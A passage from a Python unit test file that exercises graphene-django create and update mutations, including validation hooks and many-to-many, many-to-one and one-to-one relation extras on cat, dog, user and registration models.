mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name 2", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertEqual(len(result.errors), 1)
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name 3", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
def test_validate__validate_field_does_nothing__passes(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
@classmethod
def validate_name(cls, root, info, value, input, id, obj):
pass
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create()
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
def test_validate__validate_field_raises__returns_error(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
@classmethod
def validate_name(cls, root, info, value, input, id, obj):
owner = User.objects.get(pk=disambiguate_id(input["owner"]))
if value == owner.get_full_name():
raise ValueError("Cat must have different name than owner")
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create(first_name="John", last_name="Doe")
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {
"name": "John Doe",
"owner": to_global_id("UserNode", user.id),
},
},
context=Dict(user=user),
)
self.assertEqual(len(result.errors), 1)
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Kitty", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
def test_field_types__specified__overrides_field_type(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateDogMutation(DjangoUpdateMutation):
class Meta:
model = Dog
field_types = {"tag": graphene.Int()}
@classmethod
def handle_tag(self, value, *args, **kwargs):
return f"Dog-{value}"
class Mutations(graphene.ObjectType):
update_dog = UpdateDogMutation.Field()
dog = DogFactory.create()
user = UserFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateDog(
$id: ID!,
$input: UpdateDogInput!
){
updateDog(id: $id, input: $input){
dog{
id
}
}
}
"""
# Result with a string in the tag field should fail now
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogNode", dog.id),
"input": {
"name": "Sparky",
"tag": "not-an-int",
"breed": "HUSKY",
"owner": to_global_id("UserNode", user.id),
},
},
context=Dict(user=user),
)
self.assertEqual(len(result.errors), 1)
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogNode", dog.id),
"input": {
"name": "Sparky",
"breed": "HUSKY",
"tag": 25,
"owner": to_global_id("UserNode", user.id),
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
class TestUpdateMutationManyToManyOnReverseField(TestCase):
def test_default_setup__adding_resource_by_id__adds_resource(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
cat = CatFactory.create()
user = UserFactory.create()
dog = DogFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Garfield",
"owner": to_global_id("UserNode", user.id),
"enemies": [to_global_id("DogNode", dog.id)],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
cat.refresh_from_db()
self.assertEqual(cat.enemies.all().count(), 1)
def test_default_setup__calling_with_empty_list__resets_relation(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
cat = CatFactory.create()
user = UserFactory.create()
# Create some enemies
dog = DogFactory.create_batch(5)
cat.enemies.set(dog)
self.assertEqual(cat.enemies.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Garfield",
"owner": to_global_id("UserNode", user.id),
"enemies": [],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
cat.refresh_from_db()
self.assertEqual(cat.enemies.all().count(), 0)
def test_many_to_many_extras__calling_exact_with_empty_list__resets_relation(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
many_to_many_extras = {"enemies": {"exact": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
cat = CatFactory.create()
user = UserFactory.create()
# Create some enemies
dog = DogFactory.create_batch(5)
cat.enemies.set(dog)
self.assertEqual(cat.enemies.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Garfield",
"owner": to_global_id("UserNode", user.id),
"enemies": [],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
cat.refresh_from_db()
self.assertEqual(cat.enemies.all().count(), 0)
def test_many_to_many_extras__add_extra_by_id__adds_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
many_to_many_extras = {"enemies": {"add": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
cat = CatFactory.create()
user = UserFactory.create()
# Create some enemies
dog = DogFactory.create_batch(5)
self.assertEqual(cat.enemies.all().count(), 0)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Garfield",
"owner": to_global_id("UserNode", user.id),
"enemiesAdd": [dog.id for dog in dog],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
cat.refresh_from_db()
self.assertEqual(cat.enemies.all().count(), 5)
def test_many_to_many_extras__add_extra_by_input__adds_by_input(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class CreateDogMutation(DjangoCreateMutation):
class Meta:
model = Dog
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
many_to_many_extras = {"enemies": {"exact": {"type": "CreateDogInput"}}}
class Mutations(graphene.ObjectType):
create_dog = CreateDogMutation.Field()
update_cat = UpdateCatMutation.Field()
cat = CatFactory.create()
user = UserFactory.create()
# Create some enemies
dog = DogFactory.create_batch(5)
self.assertEqual(cat.enemies.all().count(), 0)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Garfield",
"owner": to_global_id("UserNode", user.id),
"enemies": [
{
"name": dog.name,
"breed": dog.breed,
"tag": dog.tag,
"owner": dog.owner.id,
}
for dog in dog
],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
cat.refresh_from_db()
self.assertEqual(cat.enemies.all().count(), 5)
def test_many_to_many_extras__remove_extra_by_id__removes_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
many_to_many_extras = {"enemies": {"remove": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
cat = CatFactory.create()
user = UserFactory.create()
# Create some enemies
dog = DogFactory.create_batch(5)
cat.enemies.set(dog)
self.assertEqual(cat.enemies.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Garfield",
"owner": to_global_id("UserNode", user.id),
"enemiesRemove": [dog.id for dog in dog],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
cat.refresh_from_db()
self.assertEqual(cat.enemies.all().count(), 0)
class TestUpdateMutationManyToManyExtras(TestCase):
def test_many_to_many_extras__calling_exact_with_empty_list__resets_relation(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateDogMutation(DjangoUpdateMutation):
class Meta:
model = Dog
many_to_many_extras = {"enemies": {"exact": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_dog = UpdateDogMutation.Field()
dog = DogFactory.create()
user = UserFactory.create()
# Create some enemies
cats = CatFactory.create_batch(5)
dog.enemies.set(cats)
self.assertEqual(dog.enemies.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateDog(
$id: ID!,
$input: UpdateDogInput!
){
updateDog(id: $id, input: $input){
dog{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogNode", dog.id),
"input": {
"name": "Sparky",
"tag": "tag",
"breed": "HUSKY",
"owner": to_global_id("UserNode", user.id),
"enemies": [],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
dog.refresh_from_db()
self.assertEqual(dog.enemies.all().count(), 0)
def test_many_to_many_extras__add_extra_by_id__adds_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateDogMutation(DjangoUpdateMutation):
class Meta:
model = Dog
many_to_many_extras = {"enemies": {"add": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_dog = UpdateDogMutation.Field()
dog = DogFactory.create()
user = UserFactory.create()
# Create some enemies
cats = CatFactory.create_batch(5)
self.assertEqual(dog.enemies.all().count(), 0)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateDog(
$id: ID!,
$input: UpdateDogInput!
){
updateDog(id: $id, input: $input){
dog{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogNode", dog.id),
"input": {
"name": "Sparky",
"tag": "tag",
"breed": "HUSKY",
"owner": to_global_id("UserNode", user.id),
"enemiesAdd": [cat.id for cat in cats],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
dog.refresh_from_db()
self.assertEqual(dog.enemies.all().count(), 5)
def test_many_to_many_extras__add_extra_by_input__adds_by_input(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class CreateCatMutation(DjangoCreateMutation):
class Meta:
model = Cat
class UpdateDogMutation(DjangoUpdateMutation):
class Meta:
model = Dog
many_to_many_extras = {"enemies": {"exact": {"type": "CreateCatInput"}}}
class Mutations(graphene.ObjectType):
create_cat = CreateCatMutation.Field()
update_dog = UpdateDogMutation.Field()
dog = DogFactory.create()
user = UserFactory.create()
# Create some enemies
cats = CatFactory.create_batch(5)
self.assertEqual(dog.enemies.all().count(), 0)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateDog(
$id: ID!,
$input: UpdateDogInput!
){
updateDog(id: $id, input: $input){
dog{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogNode", dog.id),
"input": {
"name": "Sparky",
"tag": "tag",
"breed": "HUSKY",
"owner": to_global_id("UserNode", user.id),
"enemies": [
{"name": cat.name, "owner": cat.owner.id} for cat in cats
],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
dog.refresh_from_db()
self.assertEqual(dog.enemies.all().count(), 5)
def test_many_to_many_extras__remove_extra_by_id__removes_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateDogMutation(DjangoUpdateMutation):
class Meta:
model = Dog
many_to_many_extras = {"enemies": {"remove": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_dog = UpdateDogMutation.Field()
dog = DogFactory.create()
user = UserFactory.create()
# Create some enemies
cats = CatFactory.create_batch(5)
dog.enemies.set(cats)
self.assertEqual(dog.enemies.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateDog(
$id: ID!,
$input: UpdateDogInput!
){
updateDog(id: $id, input: $input){
dog{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogNode", dog.id),
"input": {
"name": "Sparky",
"tag": "tag",
"breed": "HUSKY",
"owner": to_global_id("UserNode", user.id),
"enemiesRemove": [cat.id for cat in cats],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
dog.refresh_from_db()
self.assertEqual(dog.enemies.all().count(), 0)
class TestUpdateMutationManyToOneExtras(TestCase):
def test_many_to_one_extras__auto_calling_mutation_with_setting_field__does_nothing(
self,
):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateUserMutation(DjangoUpdateMutation):
class Meta:
model = User
exclude_fields = ("password",)
many_to_one_extras = {"cats": {"exact": {"type": "auto"}}}
class Mutations(graphene.ObjectType):
update_user = UpdateUserMutation.Field()
user = UserFactory.create()
self.assertEqual(user.cats.all().count(), 0)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateUser(
$id: ID!,
$input: UpdateUserInput!
){
updateUser(id: $id, input: $input){
user{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {
"username": user.username,
"firstName": user.first_name,
"lastName": user.last_name,
"email": user.email,
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
user.refresh_from_db()
self.assertEqual(user.cats.all().count(), 0)
def test_many_to_one_extras__calling_exact_with_empty_list__resets_relation(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateUserMutation(DjangoUpdateMutation):
class Meta:
model = User
exclude_fields = ("password",)
many_to_one_extras = {"cats": {"exact": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_user = UpdateUserMutation.Field()
user = UserFactory.create()
# Create some enemies
cats = CatFactory.create_batch(5, owner=user)
self.assertEqual(user.cats.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateUser(
$id: ID!,
$input: UpdateUserInput!
){
updateUser(id: $id, input: $input){
user{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {
"username": user.username,
"firstName": user.first_name,
"lastName": user.last_name,
"email": user.email,
"cats": [],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
user.refresh_from_db()
self.assertEqual(user.cats.all().count(), 0)
def test_many_to_one_extras__set_exact_by_id__sets_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateUserMutation(DjangoUpdateMutation):
class Meta:
model = User
exclude_fields = ("password",)
many_to_one_extras = {"cats": {"exact": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_user = UpdateUserMutation.Field()
user = UserFactory.create()
# Create some enemies
cats = CatFactory.create_batch(5)
self.assertEqual(user.cats.all().count(), 0)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateUser(
$id: ID!,
$input: UpdateUserInput!
){
updateUser(id: $id, input: $input){
user{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {
"username": user.username,
"firstName": user.first_name,
"lastName": user.last_name,
"email": user.email,
"cats": [cat.id for cat in cats],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
user.refresh_from_db()
self.assertEqual(user.cats.all().count(), 5)
def test_many_to_one_extras__add_by_id__adds_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateUserMutation(DjangoUpdateMutation):
class Meta:
model = User
exclude_fields = ("password",)
many_to_one_extras = {"cats": {"add": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_user = UpdateUserMutation.Field()
user = UserFactory.create()
# Create some enemies
cats = CatFactory.create_batch(5, owner=user)
other_cats = CatFactory.create_batch(5)
self.assertEqual(user.cats.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateUser(
$id: ID!,
$input: UpdateUserInput!
){
updateUser(id: $id, input: $input){
user{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {
"username": user.username,
"firstName": user.first_name,
"lastName": user.last_name,
"email": user.email,
"catsAdd": [cat.id for cat in other_cats],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
user.refresh_from_db()
self.assertEqual(user.cats.all().count(), 10)
def test_many_to_one_extras__add_by_input__adds_by_input(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class CreateCatMutation(DjangoCreateMutation):
class Meta:
model = Cat
class UpdateUserMutation(DjangoUpdateMutation):
class Meta:
model = User
exclude_fields = ("password",)
many_to_one_extras = {"cats": {"add": {"type": "auto"}}}
class Mutations(graphene.ObjectType):
create_cat = CreateCatMutation.Field()
update_user = UpdateUserMutation.Field()
user = UserFactory.create()
# Create some cats
self.assertEqual(user.cats.all().count(), 0)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateUser(
$id: ID!,
$input: UpdateUserInput!
){
updateUser(id: $id, input: $input){
user{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {
"username": user.username,
"firstName": user.first_name,
"lastName": user.last_name,
"email": user.email,
"catsAdd": [{"name": "Cat damon"} for _ in range(5)],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
user.refresh_from_db()
self.assertEqual(user.cats.all().count(), 5)
def test_many_to_one_extras__remove_extra_by_id__removes_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateUserMutation(DjangoUpdateMutation):
class Meta:
model = User
exclude_fields = ("password",)
many_to_one_extras = {"cats": {"remove": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_user = UpdateUserMutation.Field()
user = UserFactory.create()
# Create some enemies
cats = CatFactory.create_batch(5)
user.cats.set(cats)
self.assertEqual(user.cats.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateUser(
$id: ID!,
$input: UpdateUserInput!
){
updateUser(id: $id, input: $input){
user{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {
"username": user.username,
"firstName": user.first_name,
"lastName": user.last_name,
"email": user.email,
"catsRemove": [cat.id for cat in cats],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
user.refresh_from_db()
self.assertEqual(user.cats.all().count(), 0)
def test_many_to_one_extras__remove_nullable_field__removes_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateUserMutation(DjangoUpdateMutation):
class Meta:
model = User
exclude_fields = ("password",)
many_to_one_extras = {"mice": {"remove": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_user = UpdateUserMutation.Field()
user = UserFactory.create()
# Create some enemies
mice = MouseFactory.create_batch(5, keeper=user)
user.mice.set(mice)
self.assertEqual(user.mice.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateUser(
$id: ID!,
$input: UpdateUserInput!
){
updateUser(id: $id, input: $input){
user{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {
"username": user.username,
"firstName": user.first_name,
"lastName": user.last_name,
"email": user.email,
"miceRemove": [mouse.id for mouse in mice],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
user.refresh_from_db()
self.assertEqual(user.mice.all().count(), 0)
class TestCreateMutationManyToOneExtras(TestCase):
def test_many_to_one_extras__auto_calling_mutation_with_setting_field__does_nothing(
self,
):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class CreateUserMutation(DjangoCreateMutation):
class Meta:
model = User
exclude_fields = ("password",)
many_to_one_extras = {"cats": {"exact": {"type": "auto"}}}
class Mutations(graphene.ObjectType):
create_user = CreateUserMutation.Field()
user = UserFactory.build()
schema = Schema(mutation=Mutations)
mutation = """
mutation CreateUser(
$input: CreateUserInput!
){
createUser(input: $input){
user{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"input": {
"username": user.username,
"firstName": user.first_name,
"lastName": user.last_name,
"email": user.email,
}
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
data = Dict(result.data)
user = User.objects.get(pk=disambiguate_id(data.createUser.user.id))
self.assertEqual(user.cats.all().count(), 0)
def test_many_to_one_extras__set_exact_by_id__sets_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class CreateUserMutation(DjangoCreateMutation):
class Meta:
model = User
exclude_fields = ("password",)
many_to_one_extras = {"cats": {"exact": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
create_user = CreateUserMutation.Field()
user = UserFactory.build()
other_cats = CatFactory.create_batch(5)
schema = Schema(mutation=Mutations)
mutation = """
mutation CreateUser(
$input: CreateUserInput!
){
createUser(input: $input){
user{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"input": {
"username": user.username,
"firstName": user.first_name,
"lastName": user.last_name,
"email": user.email,
"cats": [cat.id for cat in other_cats],
}
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
data = Dict(result.data)
user = User.objects.get(pk=disambiguate_id(data.createUser.user.id))
self.assertEqual(user.cats.all().count(), 5)
def test_many_to_one_extras__add_by_id__adds_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class CreateUserMutation(DjangoCreateMutation):
class Meta:
model = User
exclude_fields = ("password",)
many_to_one_extras = {"cats": {"add": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
create_user = CreateUserMutation.Field()
user = UserFactory.build()
other_cats = CatFactory.create_batch(5)
schema = Schema(mutation=Mutations)
mutation = """
mutation CreateUser(
$input: CreateUserInput!
){
createUser(input: $input){
user{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"input": {
"username": user.username,
"firstName": user.first_name,
"lastName": user.last_name,
"email": user.email,
"catsAdd": [cat.id for cat in other_cats],
}
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
data = Dict(result.data)
user = User.objects.get(pk=disambiguate_id(data.createUser.user.id))
self.assertEqual(user.cats.all().count(), 5)
def test_many_to_one_extras__add_by_input__adds_by_input(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class CreateCatMutation(DjangoCreateMutation):
class Meta:
model = Cat
class CreateUserMutation(DjangoCreateMutation):
class Meta:
model = User
exclude_fields = ("password",)
many_to_one_extras = {"cats": {"add": {"type": "auto"}}}
class Mutations(graphene.ObjectType):
create_cat = CreateCatMutation.Field()
create_user = CreateUserMutation.Field()
user = UserFactory.build()
schema = Schema(mutation=Mutations)
mutation = """
mutation CreateUser(
$input: CreateUserInput!
){
createUser(input: $input){
user{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"input": {
"username": user.username,
"firstName": user.first_name,
"lastName": user.last_name,
"email": user.email,
"catsAdd": [{"name": "Cat Damon"} for _ in range(5)],
}
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
data = Dict(result.data)
user = User.objects.get(pk=disambiguate_id(data.createUser.user.id))
self.assertEqual(user.cats.all().count(), 5)
class TestUpdateWithOneToOneField(TestCase):
def test__one_to_one_relation_exists__updates_specified_fields(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateDogMutation(DjangoUpdateMutation):
class Meta:
model = Dog
one_to_one_extras = {"registration": {"type": "auto"}}
class Mutations(graphene.ObjectType):
update_dog = UpdateDogMutation.Field()
user = UserFactory.create()
dog = DogFactory.create()
DogRegistration.objects.create(dog=dog, registration_number="1234")
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateDog(
$id: ID!,
$input: UpdateDogInput!
){
updateDog(id: $id, input: $input){
dog{
id
registration{
id
registrationNumber
}
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogNode", dog.id),
"input": {
"name": dog.name,
"breed": dog.breed,
"tag": dog.tag,
"owner": to_global_id("UserNode", dog.owner.id),
"registration": {"registrationNumber": "12345"},
},
},
context=Dict(user=user),
)
print(result)
self.assertIsNone(result.errors)
data = Dict(result.data)
self.assertIsNone(result.errors)
self.assertEqual("12345", data.updateDog.dog.registration.registrationNumber)
# Load from database
dog.refresh_from_db()
self.assertEqual(dog.registration.registration_number, "12345")
def test__reverse_one_to_one_exists__updates_specified_fields(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateDogRegistrationMutation(DjangoUpdateMutation):
class Meta:
model = DogRegistration
one_to_one_extras = {"dog": {"type": "auto"}}
class Mutations(graphene.ObjectType):
update_dog_registration = UpdateDogRegistrationMutation.Field()
user = UserFactory.create()
dog = DogFactory.create(breed="HUSKY")
dog_registration = DogRegistration.objects.create(
dog=dog, registration_number="1234"
)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateDogRegistration(
$id: ID!,
$input: UpdateDogRegistrationInput!
){
updateDogRegistration(id: $id, input: $input){
dogRegistration{
id
registrationNumber
dog{
id
breed
}
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogRegistrationNode", dog_registration.id),
"input": {
"registrationNumber": dog_registration.registration_number,
"dog": {
"name": dog.name,
"breed": "LABRADOR",
"tag": dog.tag,
"owner": to_global_id("UserNode", dog.owner.id),
},
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
data = Dict(result.data)
self.assertEqual(
"LABRADOR", data.updateDogRegistration.dogRegistration.dog.breed
)
# Load from database
dog_registration.refresh_from_db()
dog.refresh_from_db()
self.assertEqual(dog.breed, "LABRADOR")
class TestCreateWithOneToOneField(TestCase):
def test__one_to_one_relation_exists__creates_specified_fields(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class CreateDogMutation(DjangoCreateMutation):
class Meta:
model = Dog
one_to_one_extras = {"registration": {"type": "auto"}}
class Mutations(graphene.ObjectType):
create_dog = CreateDogMutation.Field()
user = UserFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation CreateDog(
$input: CreateDogInput!
){
createDog(input: $input){
dog{
id
registration{
id
registrationNumber
}
}
}
}
"""
result = schema.execute(
mutation,
variables={
"input": {
"name": "Sparky",
"breed": "HUSKY",
"tag": "1234",
"owner": to_global_id("UserNode", user.id),
"registration": {"registrationNumber": "12345"},
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
data = Dict(result.data)
self.assertIsNone(result.errors)
self.assertEqual("12345", data.createDog.dog.registration.registrationNumber)
# Load from database
dog = Dog.objects.get(pk=disambiguate_id(data.createDog.dog.id))
registration = getattr(dog, "registration", None)
self.assertIsNotNone(registration)
self.assertEqual(registration.registration_number, "12345")
def test__reverse_one_to_one_exists__updates_specified_fields(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class CreateDogRegistrationMutation(DjangoCreateMutation):
class Meta:
model = DogRegistration
one_to_one_extras = {"dog": {"type": "auto"}}
class Mutations(graphene.ObjectType):
create_dog_registration = CreateDogRegistrationMutation.Field()
user = UserFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation CreateDogRegistration(
$input: CreateDogRegistrationInput!
){
createDogRegistration(input: $input){
dogRegistration{
id
registrationNumber
dog{
id
name
tag
breed
}
}
}
}
"""
result = schema.execute(
mutation,
variables={
"input": {
"registrationNumber": "12345",
"dog": {
"name": "Sparky",
"breed": "LABRADOR",
"tag": "1234",
"owner": user.id,
},
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
data = Dict(result.data)
dog_registration = data.createDogRegistration.dogRegistration
dog = data.createDogRegistration.dogRegistration.dog
self.assertEqual("Sparky", dog.name)
self.assertEqual("LABRADOR", dog.breed)
self.assertEqual("1234", dog.tag)
self.assertEqual("12345", dog_registration.registrationNumber)
# Load from database
dog_registration = DogRegistration.objects.get(
pk=disambiguate_id(dog_registration.id)
)
dog = getattr(dog_registration, "dog", None)
self.assertIsNotNone(dog)
self.assertEqual(dog.name, "Sparky")
self.assertEqual(dog.tag, "1234")
class TestCreateWithPlainManyToOneRelation(TestCase):
def test__many_to_one_relation_exists__creates_specified_fields(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class CreateUserMutation(DjangoCreateMutation):
class Meta:
model = User
exclude_fields = ("password",)
class Mutations(graphene.ObjectType):
